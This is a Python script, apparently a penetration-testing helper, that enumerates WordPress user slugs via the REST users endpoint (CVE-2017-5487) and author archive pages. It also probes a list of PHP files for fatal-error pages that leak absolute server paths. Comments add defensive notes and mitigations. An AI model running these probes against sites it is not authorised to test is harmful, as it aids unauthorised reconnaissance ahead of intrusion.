包含三部分：读取用户、基于 CVE-2017-5487 用正则匹配读取用户，以及 WP 配置不当时常见文件的路径泄露。
import re,requests
# Usage notes:
#   * By default the first 10 users are read (adjust as needed).
#   * For https targets the original note suggests adding verify=False.
#     NOTE(review): verify=False turns off TLS certificate validation, so the
#     responses being inspected could be altered in transit; when the host
#     uses a private CA, pass the CA bundle path through verify= instead.
#   * The path reported by the path check is an absolute filesystem path.

# Request headers shared by every check in this file (desktop Chrome UA).
headers = {
    "User-Agent": (
        "Mozilla/5.0 (Windows NT 10.0; WOW64) "
        "AppleWebKit/537.36 (KHTML, like Gecko) "
        "Chrome/58.0.3029.110 Safari/537.36"
    ),
}

# Base URL of the WordPress site being assessed (placeholder host).
url = "https://www.xxxxxxxx.com/"
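def user():
    """Print the user slugs exposed by the site's REST API users endpoint.

    Requests ``<url>/wp-json/wp/v2/users`` with the module-level ``headers``
    and prints every ``slug`` value found in the response body, one per line.
    CVE-2017-5487, cited in the file header, concerns this endpoint's user
    listing.

    Defensive note: any output means account slugs are readable without
    authentication; restricting the users endpoint to authenticated requests
    removes the exposure.

    Returns:
        None. Results (or a request-failure message) are written to stdout.
    """
    # Join on a single slash: ``url`` already ends with "/", and a doubled
    # slash in the path is not guaranteed to route to the REST API.
    endpoint = url.rstrip("/") + "/wp-json/wp/v2/users"
    try:
        # Without a timeout, requests waits indefinitely on a stalled server.
        res = requests.get(url=endpoint, headers=headers, timeout=10)
    except requests.RequestException as exc:
        print("request failed for " + endpoint + ": " + str(exc))
        return
    res.encoding = "utf-8"
    # The body is scanned as text, so slugs are picked up wherever the
    # `slug":"..."` pair appears in the response.
    for slug in re.findall(r'slug":"(.*?)"', res.text):
        print(slug)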
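def user2():
    """Print author slugs revealed by author-archive pages for IDs 1-19.

    For each ID, requests ``<url>/?author=<id>`` with the module-level
    ``headers`` and prints whatever the pattern captures from the
    ``<body class="archive author author-...">`` attribute of the returned
    HTML, one match per line.

    Defensive note: any output means author archives map numeric IDs to
    account slugs; disabling or redirecting author archives for
    unauthenticated visitors closes this.

    Returns:
        None. Results (or request-failure messages) are written to stdout.
    """
    # Compiled once; the pattern does not change between iterations.
    body_class = re.compile(r'<body class="archive author author-(.*?) author')
    base = url.rstrip("/")
    for author_id in range(1, 20):
        target = base + "/?author=" + str(author_id)
        try:
            # Without a timeout, one stalled response blocks the whole loop.
            response = requests.get(url=target, headers=headers, timeout=10)
        except requests.RequestException as exc:
            # A single failed probe should not abort the remaining IDs.
            print("request failed for " + target + ": " + str(exc))
            continue
        response.encoding = "utf-8"
        for slug in body_class.findall(response.text):
            print(slug)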
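def Route():
    """Report which listed PHP paths answer with a PHP "Fatal error" page.

    Each path in the list is requested under ``url`` with the module-level
    ``headers``. When the response body contains the text ``Fatal error``,
    the requested URL is printed followed by "绝对路径泄露" (absolute path
    disclosure).

    Defensive note: PHP includes the absolute file path in fatal-error output
    only when errors are displayed to the client; turning ``display_errors``
    off on production hosts (and logging instead), or denying direct web
    access to these files, removes the leak.

    Returns:
        None. Findings (or request-failure messages) are written to stdout.
    """
    candidates = [
        '/wp-admin/includes/admin.php',
        '/wp-content/plugins/akismet/akismet.php',
        '/wp-content/plugins/akismet/hello.php',
        '/wp-content/plugins/default/index.php',
        '/wp-content/plugins/default/404.php',
        '/wp-settings.php',
        # NOTE(review): this path does not look like part of WordPress --
        # confirm it belongs in this list.
        '/source/function/function_connect.php',
        'wp-content/themes/b2/',
    ]
    # The entries mix leading-slash and bare paths while ``url`` ends in "/",
    # so normalise both sides and join on exactly one slash.
    base = url.rstrip("/")
    for path in candidates:
        target = base + "/" + path.lstrip("/")
        try:
            # Without a timeout, one stalled response blocks the whole loop.
            response = requests.get(url=target, headers=headers, timeout=10)
        except requests.RequestException as exc:
            # A single failed request should not abort the remaining checks.
            print("request failed for " + target + ": " + str(exc))
            continue
        response.encoding = "utf-8"
        if "Fatal error" in response.text:
            print(target + "绝对路径泄露")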
# Script entry point: only the path-disclosure check runs here; user() and
# user2() are defined above but are not called.
Route()